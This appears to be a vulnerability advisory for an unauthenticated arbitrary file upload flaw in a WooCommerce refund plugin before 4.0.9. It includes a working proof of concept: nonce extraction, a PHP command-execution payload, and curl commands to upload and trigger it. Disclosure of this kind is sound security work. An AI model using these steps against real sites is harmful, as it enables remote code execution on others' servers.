Lucene search
CydaveWPEX-ID:8965A87C-5FE5-4B39-88F3-E00966CA1D94HistoryDec 05, 2022 - 12:00 a.m.
Return Refund and Exchange For WooCommerce < 4.0.9 - Unauthenticated Arbitrary File Upload
2022-12-0500:00:00
cydave
80
woocommerce
file upload
security exploit
arbitrary.
EPSS
0.003
Percentile
71.2%
The plugin does not validate attachment files to be uploaded via an AJAX action available to unauthenticated users, which could allow them to upload arbitrary files such as PHP and lead to RCE
1. Install and activate woocommerce (dependency, no setup required)
2. Install and activate the vulnerable plugin
3. As an unauthenticated user, navigate to the "Cart" page at /cart/ (this page should exist because of woocommerce)
4. Extract the plugin's nonce from the page source (CTRL+F for "wps_rma_nonce")
5. Prepare a payload:
echo '<?php passthru("id"); ?>' > /tmp/payload.php
6. Invoke the following curl command, with the previously extracted nonce, to upload the payload:
curl -i 'https://example.com/wp-admin/admin-ajax.php?action=wps_rma_return_upload_files&security_check=<NONCE>' \
-F 'wps_rma_return_request_order=prefix' \
-F 'wps_rma_return_request_files[]=@/tmp/payload.php;type=image/jpeg'
7. Trigger the payload, it should have been uploaded to /wp-content/attachment/<value of wps_rma_return_request_order>-<filename>:
curl https://example.com/wp-content/attachment/prefix-payload.phpRelated
prion
prion
Design/Logic Flaw
2022-12-26 13:15:00
cvelist
cvelist
wpvulndb
wpvulndb
cve
cve
CVE-2022-4047
2022-12-26 13:15:12
nvd
nvd
CVE-2022-4047
2022-12-26 13:15:12
githubexploit
githubexploit
Exploit for CVE-2022-4047
2023-09-26 07:23:44
Exploit for CVE-2022-4047
2023-12-14 07:36:01